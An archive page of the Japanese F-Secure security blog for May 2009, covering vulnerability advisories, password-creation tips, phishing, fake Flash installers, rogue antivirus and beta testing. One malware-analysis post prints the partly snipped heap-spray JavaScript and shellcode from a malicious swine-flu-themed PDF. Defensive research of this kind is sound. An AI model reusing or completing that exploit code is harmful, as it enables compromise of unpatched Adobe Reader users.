エフセキュアブログ : 2009年05月

by：ミッコ・ヒッポネン

　昨日、バラク・オバマ大統領がサイバースペース保護のための政策を発表した。

　ジョージ・ブッシュがマルウェアやボットについてスピーチを行うところを想像するのは難しかったろう。そして正にそれが、オバマの行ったことだ。

　オバマ大統領の口から発せられると、以下のようなフレーズは非常にナチュラルに聞こえる：「我々に害をなす可能性のあるサイバー犯罪者に先んじるため、我々はスパイウェアやマルウェア、なりすまし、フィッシング、ボットネットといった、全く新しいボキャブラリーを学ぶ必要がありました。」

　興味深いことに、オバマ大統領はConfickerについても名指しで言及している。彼のスピーチの全文はオンラインで入手可能だ。

　もう一つ引用を：「現在の情報時代は、まだ初期の段階にあります。我々はWeb 2.0に生きているに過ぎないのです。」

　New York Timesサイトで、オバマ大統領の発表に対する私のコメントがご覧頂ける。

Microsoft DirectShowの脆弱性

2009年05月30日00:07

　Microsoft's DirectShow（DirectX）には脆弱性がある。影響を受けるのはWindows 2000/XP/Server 2003だ。

　この脆弱性は、quartz.dll Quicktimeパージングを利用する。とは言え、QuickTimeがインストールされている必要はない。

　Microsoftがいくつかの回避方法を提示している。

MSA971778

　詳細はマイクロソフトセキュリティアドバイザリ 971778を参照して欲しい。

MSA971778

　Microsoftは現在、この脆弱性に対する限定的な攻撃を確認したことを報告している。

付記：Microsoftがレジストリ変更を行ってくれる「Fix it」ツールを公開した。

＞＞原文へのリンク

エフセキュアブログ正式オープンのごあいさつ。

2009年05月28日14:22

risa_ozaki

横浜発

by：尾崎リサ

エフセキュアブログ管理人の尾崎リサです。

5月20日に、エフセキュアブログを無事オープンすることができましたこと、ブックマークに入れてくださった方々、既にブログ等でご紹介いただきましたブロガーのみなさま、そして関係者の皆様には厚く御礼申し上げます。私は、2008年11月末よりエフセキュア株式会社で広報を担当しておりますが、情報セキュリティ業界での経験も浅く、勉強する日々でございます。ぜひ、何かお気付きの点がございましたらエフセキュアブログ管理人：尾崎まで、どしどしご意見をお寄せ下さい。

risa.ozaki ＠ f-secure.com

情報セキュリティ動向だけでなく、まったく関係の無い日々の徒然まで・・・。エフセキュアのこと、ウイルスのこと、サイバー犯罪のこと、フィンランドのこと、横浜のこと、オフィシャルブロガーのオフラインレポートなどなど、思うままにこのブログを介してみなさまにお届けできるように努めて参ります。誰もがオンライン上でのセキュリティトラブルに巻き込まれかねない現代社会において、エフセキュアブログをオンラインセキュリティ、アンチウイルスの最新情報入手の場としてご活用いただけたら、とってもうれしいです。

より安全で快適なインターネットライフを過ごして頂く為にも、今後とも情報満載のブログを目指して参りますので、よろしくお願い致します。

また、これから数回にかけて、オフィシャルコメンテーターのみなさまのプロフィールを随時ご紹介致しますので、お見逃しなく！

パスワードメモのソルティング-その2....L0phtcrack 6発表

2009年05月28日03:59

パスワードのメモをソルティングする以前に、どのようなパスワードを作るかは大事です。しかし、一般のPC個人ユーザーにとっては「パスワードを忘れてしまうこと」の方が大問題ですから、名前+生年月日のようなパターンはどうしても出て来てしまいます。「難しいパスワードを作れ」と言う以前に、一般ネットユーザーとしては「覚え易くて強度のあるパスワードの作り方はないのか?」という方が差し迫った問題かもしれません。

パスワードの話題が出たところですが、ちょうど昨日5月26日にパスワードクラッカーとして長年有名な「L0phtcrack」の新バージョン6が発表されました。最初のバージョンは1997年発表ですから、すでに12年あまりの歴史のあるアプリケーションということになってしまいました。L0phtcrackを開発したのはアメリカのボストンにあったハッカーグループ「L0pht Heavy Industries」ですが、これは後に@Stake社というセキュリティコンサルティング会社となり、最終的にはSymantec社に買収されました。実際には優秀なメンバーはじつはSymantec社による買収直前に辞めてしまっていて、独自にiSec Partners社などのセキュリティ企業を立ち上げて活躍しています。

この新バージョン発表に合わせて、http://www.l0phtcrack.com/にはL0phtcrackの解説ビデオがアップされていますが、この中でパスワードクラッカーがどのように解読を試みるかのヒントが少し触れられています。パスワードクラッカーには、人間がどのようにパスワードを作るかという傾向を分析したルールテーブルがあり、それを使って、まずはパスワードを前半と後半に分けてクラックしていきます。ということは、パスワードクラッカーの仕組みを知れば、ある程度の裏をかくことが出来るかもしれません。

よくあるパターンと言われているものは、文字が前+数字が後ろになっているものがあります:
abcd1234
abcde123
abcdef12

名前+生年月日などのようなパスワードはこのパターンにハマりますから、後半の末尾を数字と予測してクラックしていくと効率が上がりますね。また、名前の場合なら最初が大文字になっている場合が多いでしょう
Abcd1234
Abcde123
Abcdef12

ということは、後ろに数字を持って来たパスワードは弱いことになりますし、最初の文字を大文字にするのは効果が薄いわけです。しかし、だからといって、これを裏返して単純に数字を前に持って来るパターンの:
1234abcd
123abcde
12abcdef
にしても、これも予測し易いので同じ程度の強さしかないでしょう。

そこでの一手は、文字と数字を交互にする手法です。また大文字を途中に混ぜれば良くなるでしょう。
1a2B3c4D
aB1c2D3e
aB1cD2Ef

これを元にいじると、名前+生年月日でもある程度強度のあるパスワードが作れるかもしれません。例えば:
Mika 1129 → m1I1k29A
Kyoko 323 → kY3ok23O
Kiyosi 81 → kI8yO1sI

セキュリティ関係者から見ると、名前+生年月日を使うというだけで「セキュリティをダメにする」から論外という意見もあるかもしれませんが、「フツーの人々」が大多数のインターネットユーザーとなった現在では、「覚え易くて強度のあるパスワードの作り方」の手法はもっと研究されて一般的になる必要があるかもしれません。

パスワードメモのソルティング

2009年05月27日23:29

パスワードはポストイットに書こうと言われて面食らっている人も多いかもしれません。何しろ伝統的に「パスワードをポストイットに書いて貼っておく」というのはセキュリティをダメにする悪習慣の代表例のように言われて来たからです。しかし、このポストの中で解説されているのは「ソルティング (Salting)」と云われる、あるデータの文字列の中にそれとは関係のない文字列を加えることで、解読を難しくする手法の簡易版です。

現実的に、ネットショップやオークションやブログやSNSやYouTubeや写真共有サイトなどで仕事以外にIDとパスワードを求められる場面が急増している現在では、違うパスワードをサイトごとに使うのは覚えることが不可能になり、何かにメモしない限り同じパスワードを多数のサイトで使ってしまう状況に陥ります。

さらに良くないことに、最近は!@#$%^&*などの記号をパスワードに使えない場合が増えている上に、長さも8文字に制限しているサイトすらあります。一種類の8文字の英数字だけのパスワードを各種のサイトで使い回した場合、どこか一カ所ででもパスワード盗難に遭えば使っているすべてのサイトのアカウントが危険に晒されるのは明らかです。

企業などでの利用場面でなら、USBキーを使った認証やSecurIDなどの同期型時限パスワード発行ガジェットや、長いパスワードにしてPDAに保存して持ち歩く方法など、いろいろな作戦が考えられてきましたが、一般の個人が利用するためにはどうにも複雑過ぎます。

実際には、紙に書いたパスワードに対して使われるはずの、人間の頭の中にあるパスワードクラッカーはあまり高性能ではありません。ですから、もし現実的に考えるならこのポストのように「安全にパスワードをメモする方法」を考えるのは妥当な提案と言えます。
(とはいえ、私なら3文字と言わず、もっとたくさんのソルティングを加えることをお薦めしたいところです)

パスワードはポストイットに書こう

2009年05月27日01:07

　Facebookはゆっくりと、だが確実に、活発なスパムに対する自衛を進めている。

　専門家の間では考察も行われている。何故Facebookなのか？　Facebookは、個人のパスワードすべて（すなわち銀行やコマースサイトの）を立ち上げ、盗むための要となっているのだろうか？　Facebookに登録すると、メインの電子メールアカウントやそれに伴うすべてを危うくする可能性があるのだろうか？

　そうかもしれないが、理由が何であれ、Facebookの人気の高さが同サービスをターゲットにしている。その成長や規模はすさまじいものだ。

　フィンランドを例にとってみよう。フィンランドにはたった530万人しか居住していないというのに、100万以上のFacebookアカウントがあり、地域ネットワークは54万4000人以上のメンバーを擁している。このような規模のものはいずれにせよ、詐欺師たちの格好のターゲットとなる。

　善人が行くところには、常に悪人たちがつきまとうのだ。

　だから当然、サイトごとに固有の複雑なパスワードを設定するのが優れた方針だ。でしょう？

　あるアイディアがある。パスワードを書いておくのだ。いや、冗談ではなく。

　そしてパスワードを書いたら、サイフの中に入れておく。考えてみて欲しい。サイフの中には何を入れているだろう？　そう、銀行のキャッシュカードだ。そして銀行のカードには、口座名、口座番号が書かれている。

　なんだかオンラインアカウントとパスワードのようだ。

　カギはこれだけ──それは2部制のパスワードだ。何故なら、アカウント名とキャッシュカード番号にも暗証番号が必要だからだ。

　では、このスクリーンショットを見て欲しい。何が分かるだろうか？

Passwords on a post-it

　ポストイットに書かれたパスワード。もちろん単なる例だが…　非辞書的なものだ。

　その他3つの一般的な文字を思い浮かべて欲しい。これで10文字の複雑なパスワードの完成だ。そしてこれら追加した文字は、先頭、真ん中、最後尾のどこにでも挿入することができる。

　我々が言おうとしているのは、以下のようなことだ：

　上記の例では最初の3文字はウェブサイトに基づいている。すなわち「aMA」はAmazon.comを表している。これは「AMa」とか、「aMa」とか、「AMA」という風に、何種類かに書き分けることができるだろう。あなたにとって覚えやすいものこそ良い方法と言える。

　そして次（あるいは他）のパート、今回の例では「2242」はまったくランダムなものだ。忘れないように実際に書いておき、安全にしまっておくべきはこの部分だ。

　その上で、すべてのパスワードに、さらに3つの文字（あなたの「暗証番号」だ）を追加するというメソッドを使用する。「35!」といったような3文字だ。これにより、完全なパスワードは「aMA224235!」あるいは「aMA35!2242」あるいは「35!aMA2242」となった。

　我々のもう一つの例では「gMA35N135!」となる。

　暗証番号は絶対に紙に書いてはいけない。この情報は頭の中にしまっておくこと。銀行のキャッシュカードの暗証番号と同様だ。

　今回の例で、ポストイット上に電子メールアドレスが書かれていないことに注意して欲しい。

　サイフが盗まれたらどうするだろう？　銀行に電話して、カードを停止するするはずだ。

　ではポストイットについては？　電子メールアドレスや暗証番号が含まれていなければ、時機を逸せず新しい紙でパスワードをリセットすることができる。

　この方法論を使用すれば、複雑で固有なパスワードを確保することができ、忘れたときにも扱いやすい。人間は誰でも、時々物忘れをするのだから。

　そしてもし一つのサイト、たとえばFacebookのようなサイトでフィッシング詐欺にあっても、他のアカウントは同じパスワードを使用していない。

　そうそう、最後のアドバイスを。

　ポストイットをモニタに貼り付けないこと！　キーボードの裏側もダメだ…　ほかの人にもお馴染みの場所なのだから。

Rai.TV NeaPOLIS

2009年05月26日20:26

fsecure_response

クアラルンプール発

by：レスポンスチーム

　我々は先頃、イタリアのテレビRaiのテクノロジー番組、neaPOLISのイタリア人レポーターを迎えた。

　イタリア語が話せる方は、ここからクリップが視聴できる…　我々のHelsinki Security Labをご覧になりたい場合もどうぞ。

インフルエンザネタのMal PDF

2009年05月26日08:48

hiroki_iwai

by：岩井博樹

新型インフルエンザをテーマにした標的型攻撃に関して。

Malicious PDF といえば、JSRedir-R（通称Genoウイルス）でも使われるなど、今旬な攻撃ですね。

他の手口では、先週私のボス宛のメールに添付されていました。内容は豚インフルエンザのネタの標的型メールです。カタコトの日本語の標題なのでそうそうクリックする人はいないと思いますが、一応注意しておく必要がありそうです。

Subject: 病人の行動路線,こ?注意なさい
MD5: 9137fec2f6a1b020cd877cebce8b8f67

ちなみに、添付されていたPDFに含まれるコードは次のようなものでした。

Exploitされますと、中国のサイトへ飛んでいきます。(´；ω；`)

var sc = unescape("%u5850%u5850%uEB90%u4022%u5A48%u5F52%u8B66%u800A"+ "%u30F9%u1A74%uE980%uC064%u04E1%uED80%u8064%u0FE5"+ "%uCD02%u0F88%u4242%uEB47%uE8E3%uFFD9%uFFFF"+

--- snip ---

"%u6F6C%u6864%u6F6C%u6764%u6970%u6F72%u6664%u6767"+ "%u6470%u6F6C%u6971%u7369%u7269%u7169%u6F69%u6670"+ "%u6C64%u6464%u6C72%u6464%u6464%u6464%u6464%u6C69"+ "%u676C%u6470%u6964%u6770%u3030"); function repeat(count,what){ var v = ""; while (--count >= 0) v += what; return v; } function myunescape(buf) { var ret=''; for (var x=0;x < buf.length; x+=2) { ret += util.byteToChar(Number('0x'+buf.substr(x,2))); } return ret; } function exploit() { blah = repeat(128, unescape("%u4141%u4141%u4141%u4141%u4141")) + sc; bigblock = unescape("%u4141%u4141"); headersize = 20; wap = headersize+blah.length; while (bigblock.length<0x40000) block = block+block+fillblock; mm = new Array(); for (i=0;i<200;i++) mm[i] = block + blah; of = repeat(4096, myunescape("0a0a0a0a")); var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];Collab["\x67\x65\x74\x49\x63\x6f\x6e"](of+a[0x0]); } var inBrowser = this.external; if (inBrowser) var shaft = app.setTimeOut("exploit()",1200); else exploit();

FacebookフィッシャーはMac好き？

2009年05月26日00:21

　最近、Facebookフィッシングが増加している。

　とは言え、何ら新しいところはなく、PhishTank.orgはかなり以前から、Facebookを「Targeted Brand（標的ブランド）」としてトラッキングしてきた。

　以下は本物のFacebookログインページのスクリーンショットだ：

　そして以下が、PhishTankの偽ページ：

　違いにお気づきだろうか？

　偽ログインページには、「We helps you」と文法的な間違いがある…　そして、Safariブラウザでレンダリングされているように見える。

　もしかして、フィッシャーたちはMacの方が好きなのだろうか？

新型インフルエンザをテーマにした標的型攻撃

2009年05月25日22:02

fsecure_response

クアラルンプール発

by：レスポンスチーム

以前は豚インフルエンザと呼ばれていたH1N1（新型）インフルエンザは、流行のピークこそ今月初旬だったが、今もニュースをにぎわせ続けている。

悪意ある攻撃で、H1N1をテーマにしたものはそれほど広まってはいないものの、限定された使用はいくつか見かけている。我々のハニーポットが先週集めてきた事例をご紹介しよう。

これは悪意あるPDFファイルだ（何一つ新しいところは無い）。

このPDFを開くと、これはAdobe Readerを利用してバックドアを仕込み、H1N1インフルエンザに言及するファイルを示す。

以下がスクリーンショットだ。

H1N1

この舞台裏で何が起きているのだろうか？　このエクスプロイトは「AcrRd32.exe」という名の悪意あるファイルを、コンピュータの一時フォルダに仕込む。

この悪意あるファイルは、「call home」するため3種のIPアドレスに接続する。これらのアドレスは、テキサス（207.200.45.12）、ブダペスト（89.223.181.93）およびハイデラバード（202.53.69.130）にある、もしくはあった。

この攻撃の対象とされた個人については不明だ。

Gadgetadvisor.com の悪意ある IFrame

2009年05月22日15:35

fsecure_websecurity

by：ウェブセキュリティチーム

　あなたはガジェット・マニアだろうか？　購入前には、Gadget Advisorでアドバイスをチェックする習慣があるだろうか？

　我々のウェブ・セキュリティ・アナリストが、人気の高いこのサイトで、悪意あるサイトに訪問者をリダイレクトする、悪意あるIFrameを発見した。

gadgetdvisor_01

　同サイトはAdobe AcrobatおよびReader用のPDFブラウザ・プラグインを検知すると、スタックベースのバッファ・オーバフロー脆弱性（CVE-2008-2992）を利用する、悪意あるPDFファイルをロードする。

　この攻撃の結果、util.printf JavaScriptファンクションをコールすることで、Trojan-Downloader.Win32.Agent.brxrとして検出されるトロイの木馬が脆弱なシステム上に仕込まれ、マシンにトロイの木馬をダウンロードする目的で、悪意あるァ & ェブサイトに接続することになる。同トロイの木馬に感染すると、リモート攻撃者はそのユーザーのマシンにアクセスすることができる。

　以下はこの悪意あるPDFファイル内に含まれる可読コードだ。

gadgetadvisor_exploit_1

　この攻撃は、以前の、修正パッチを当てていないバージョンのAdobeプログラムを標的としており、最新のAdobeアップデートはすでにこの問題をフィックスしている。詳細およびアップデートについては、Adobeの以下のページを参照のこと：http://www.adobe.com/support/security/bulletins/apsb08-19.html　AcrobatおよびReaderのJavaScriptファンクションを停止することで、この脅威を避けることも可能だ。

MacOSXセキュリティアップデートから抜け落ちたJava脆弱性対策

2009年05月21日02:19

Mac ProtectionポストでF-SecureのMacOS対応ベータ版が発表された矢先、先週のMacOSXセキュリティアップデートに含まれずにいた問題が発見された模様です。

Threat Postによると、これはJavaの脆弱性で、今年始めに開催されたカナダのセキュリティコンファレンス「CanSecWest」で発表されていたものですが、先週のOSXアップデートでも未だに修正されずに残っていたのです。Javaそのものの脆弱性ということで、MacOS X, Windows, Linux, OpenBSDで動くFirefox, IE6, IE7, IE8, Safariの上で同じエクスプロイットを走らせることが可能になってしまうという、広範囲に及ぶ問題でした。

Macが人気機種となり始めるにつれて、MacOSを狙うエクスプロイットが作られるようになるのは予想されていたことでした。安全な環境を保つためには、セキュリティ対応も同時にスピードアップして行く必要があるでしょう。

Mac Protection

2009年05月21日00:12

　以下を見て欲しい：

　先頃ご紹介したインターネットセキュリティテクノロジプレビューに似てはしないだろうか？

　だが良く見てみると、上の画像がMac Protectionのものであることが分かるだろう。

　我々は以前、スニーカーネットの時代にMacソリューションを用意していた。アップデートはフロッピーを介して提供された。この新しいMac Protection（アンチウイルスを含む）は、テクノロジプレビュープログラムの一部で、ベータプログラムページからダウンロードできる。OS X version 10.5（Leopard）をインストールしたIntelプロセッサ・ベースのMacに対応。

　Macはコンシューマーにも、そしてマルウェア作者にも人気がある。機会さえあればMacを感染させる可能性のある、Zlobコーデック型トロイの木馬は数多くある。Macがこれだけ普及している今、再び我々のMacソリューションを提供すべき時だと思う。試してみて欲しい。

User-Agent を利用して攻撃分析ができるかも !?

2009年05月20日10:04

hiroki_iwai

by：岩井博樹

　ブラウザのユーザー・エージェントの話がありましたが、User-Agent はウェブサーバの攻撃傾向の分析にも利用できます。

　一般的な（？）User-Agent のリストは次のサイトで調べることができます。不思議な User-Agent を見かけたら、ひとまずチェックしてみると良いでしょう。

List of User-Agents (Spiders, Robots, Browser)
http://www.user-agents.org/

　もう一つ、攻撃の分析で有効なのが、統計分析です。ウェブサイトを狙った攻撃の多くは、意外にも普通の User-Agent であることが多いです。これはウェブブラウザを介して攻撃をしているというわけではなく、User-Agent 情報を詐称しているだけであることは良く知られています。

　しかし、一般に "全く同じ" User-Agent情報が大量に記録されることは稀です（全くの同一環境から複数回アクセスされるなどすれば別ですが）。このことを利用し、"全く同じ" User-Agentが大量に発生している箇所を探すことで、攻撃ツールでの探査活動などが見つけられることがあります。

　特に某国の攻撃ツールはその傾向にあるようです。（笑）

　一般に企業のウェブサイトであれば、マーケティング目的で定期的にアクセスログを分析していると思いますので、一度見せてもらうと興味深い結果が出るかもしれません。

不正なブラウザ・エージェント

2009年05月19日00:30

　不正なアンチウイルス・アプリケーションは、どれほどの問題なのだろうか？　見てみよう。

　貴方のブラウザのユーザー・エージェントは何だろう？　何か考えがあるだろうか？　Firefoxの場合、以下のようなものだ：

What is my user agent?

　皆さんがお使いのブラウザについては、whatsmyuseragent.comで確かめることができる。ではここでは、以下のユーザー・エージェントについて見てみることにしよう：

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; AntivirXP08; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

　分かるだろうか？　中央に「AntivirXP08」とある。これは一体何だろう？

　不正なアプリケーションには、ブラウザのユーザー・エージェントに変更を加えるものがある。我々はこれまで、様々なAntivirXP08ストリング・バリエーションを見てきた。修正されたストリングは、「ビジネス」を不正なアプリケーションのウェブサイトに導くのに役立つ関連会社を特定するのに利用される可能性がある。

　修正されたユーザー・エージェントは、異なるコンテンツを提供するのに使用される場合もある。AntivirXP08の犠牲者に、インストーラをダウンロードするよう促す必要はない。その代わり、詐欺を完了して不正なアプリケーションを購入するターゲットとされる可能性があるのだ。

　感染したユーザー・エージェントは、どれだけあるのか？　Toniが我々のSinkholeの一つを調べたところ、2009年4月のログには、AntivirXP08を含むエージェントを使用するユニークIPアドレスが6万3000含まれていた。

　6万3000。かなりの感染量ではないだろうか？　それにここには、「Antimalware2009」といった、その他のストリングは含まれていないのだ。

　非常に大きな問題のささやかな測定である。

twitter.com/FSLabs

2009年05月15日01:13

　我々のTwitterアカウントは、twitter.com/FSLabsでブログをフォローするのに使用することができる。#Blogは我々のRSSフィードからの情報を示す。

　他の興味深いリンクについても、そちらにtweetする場合がある。

Adobe Flash Playerの偽サイト

2009年05月13日16:40

fsecure_websecurity

by：ウェブセキュリティチーム

　我がウェブ・セキュリティ・アナリストの一人が、訪問者に偽のAdobe Flash Playerファイルをインストールさせるウェブサイト（Alexaでランキングは118,000位）を偶然発見した。このサイトはユーザーに、同サイトの動画を見るために「新しいバージョンのAdobe Flash Player」をダウンロードせよというメッセージを出す。

Fake Adobe Flashplayer

　「続ける（Continue）」をクリックすると、訪問者は以下のページに誘導される：

Fake Adobe FlashPlayer

　かなり本物っぽく見えるのではないだろうか？　ここでは「install_flash_player.exe」ファイルをダウンロードするようにさえ促している。だが、このサイトを発見したアナリストはLinuxシステムを使用しており、これはちょっと奇妙だ。

　このサイトが（かなり出来の良い）偽サイトであることが分かる。訪問者がアドレスバーをじっくり見ない限り、かなり簡単に騙されるはずだ。

　チェックサムとデジタル署名は偽であることを示しているのだが、ダウンロードされたインストーラも、本物のAdobe Flash Playerインストーラに見える。

Fake Adobe Flashplayer installer

install_flash_player.exe version 10.0.22.87
md5: 51F26C0051E97A91145971FE5BC632FF

malware_install_flash_player.exe
md5: 71AD0C4A4168AA98BB20E3561E505CC7

　マルウェア・リンク上でのリバース・ドメイン・ルックアップによれば、この偽サイトはブルガリアでホスティングされている。

　この脅威は、最新のアンチ・ウィルス定義へのアップデートにより検出することができる。

アップデートに関するアップデート

2009年05月13日14:04

patrik_runald

サンノゼ発

by：パトリック・ルノー

　昨日、数社のベンダーが多くのアップデートを公開した。早いうちにゲットしよう。

Microsoft - patch for PowerPoint fixes 14 vulnerabilities
Adobe - Adobe Readerの脆弱性2種のパッチ
Apple - OS Xで67のセキュリティ問題を修正

Security Updates en masse

サイバー犯罪対策コンファレンスが今日からスペインで開催

2009年05月12日05:49

Darkmarket.wsはどんなサイトだったか？ではオンライン犯罪者の捜査の様子が解説されていましたが、マルウェアとフィッシング対策を目的とするAnti Phishing Working Group (APWG)が主催する国際コンファレンス「CeCOS III」が今日5月12日から3日間、スペインのバルセロナで開催されています。昨年のCeCOSは東京で開催されたので、日本のセキュリティ関係者で行かれた方もいると思います。
http://www.antiphishing.org/events/2009_opSummit.html

今日は、4月に話題となったConfickerについてのSRI Internationalからの発表があった模様です。
Twitterでのアップデートは@APWG か#CeCOSでサーチしてみると、随時いろいろ見つかると思います。

ベータ・テスターを募集

2009年05月11日23:23

　新しいソフトウェアをインストールし、試してみるのはお好きだろうか？　iPodが貰えるチャンスに興味があるだろうか？　答えがイエスなら、読み続けて頂きたい…

　エフセキュアインターネットセキュリティテクノロジプレビュー（ISTP）の最新ビルド「version 9.40 build 172」が先週金曜にリリースされた。製品にはいくつかの大きな変更が実装されており、ISTP 9.40がその最初のお披露目となる。Security Labが9.40をテストしているが、我々はブログの読者にも参加して欲しいと考えている（ベータプログラムをダウンロード）。

　皆さんが最初に気づくであろう変更は、ファーストレベルGUIだろう。

F-Secure Technology Preview 9.40

　現行のデザインとはかなり異なっており、最終的には全GUIの基盤となる予定だ。現在改良を行っているため、現時点でのフィードバックは非常に助けになる。今年のリリースとはいかなくても、次回に。

　同テクノロジにはその他、多くの変更がある：

  •  スキャニングのパフォーマンスを改善
  •  ブート最適化
  •  プロセス最適化
  •  ディープガードの強化
  •  新たなスパムコントロール
  •  ネットワークベースの新たなペアレンタルコントロール

　以下は新しいBrowsing Protectionオプションだ。

F-Secure Technology Preview 9.40 <br />Browsing Protection

F-Secure Technology Preview 9.40 <br />Browsing Protection

　今回、Exploit Shieldとネットワークベースのレピュテーション保護が統合された（IEおよびFirefox）。問題のある既知のサイトはブロックされ、不明のサイトは「シールド」される。そしてShieldが発動するたびに、問題のあるサイトが学習され、保護用フィードバックループを作成する。次回アクセスしようとする人は、シールドされるのではなく、アクセスがブロックされることになる。

　我々の現行ラインナップを良くご存知の皆さんは、ディープガードがリアルタイム・スキャニング「System Control」設定内に含まれることを知っているはずだ。ディープガードは現在、リアルタイム・スキャニング・オプションからははずされており、改良されたプロセス・モニタを含んでいる。

F-Secure Technology Preview 9.40 <br />DeepGuard

F-Secure Technology Preview 9.40 <br />DeepGuard

　ISTPのディープガードは、もちろん「クラウド」を利用している。

nhips_dialog

　また既知の悪意あるアプリケーションは、サーバ・クエリに基づいてブロックされる。.

nhips_dialog_highlighted

　オフラインの場合、ディープガードは最新の行動エンジンテクノロジを使用し、悪意あるアプリケーションを自動的にブロック可能だ。

DeepGuard Flyer

　このようにたくさんの重要な変更が加えられているため、まだテストすべき事ややるべき事は多い。社内でもテストを行ってはいるが、皆さんもご存知のように、実際のユーザーによる現実世界でのテストは、こうしたプロセスにとって非常に重要だ。

　今回我々は、ぜひ有意義なフィードバックが欲しいと思っている。ISTP 9.40 build 172のテストを行い、ベータプログラムにフィードバックしてくれた人は誰でも、抽選に参加することができる。（build 165に関して、すでに詳細なフィードバックを提供してくれた方は、今回除外となる。）ベータプログラムチームが、iPodやその他クールな賞品用の予算を集めているところだ。詳細については、まもなくベータプログラムのページに掲載される。

　同テクノロジのクールな点として、自動更新機能がある。すなわち、ISTP 9.30を実行していると──我々のアップデート・チャンネルを介して、今日はBuild 172にアップデートされるはずなのだ。もしすぐにアップデートされないなら、それこそが我々の求めているフィードバックと言える。

　ISTPをベータプログラムページからダウンロードして欲しい。よろしく！

　Labの我々にとって非常に重要な点を付記しておく──このISTP 9.40リリースには、検出技術に多くの変更が加えられている。これらは、これまでの製品リリースよりも能動的であり、ヒューリスティックだ。（ディープガードが良い例だ。）この変更により、未定義あるいは未知のマルウェアの検出が強化されるはずだ。皆さんが何か新しいサンプルを発見したら、ぜひ知らせて欲しい！　また、あまりにも攻撃的な検出に遭遇した場合にも、フィードバックして頂けるとありがたい。

　検出に関連したLabへのフィードバックには、Sample Analysis Systemを使用して欲しい。

　また、ベータプログラム・フィードバックフォームは、製品関連の問題について使用して欲しい。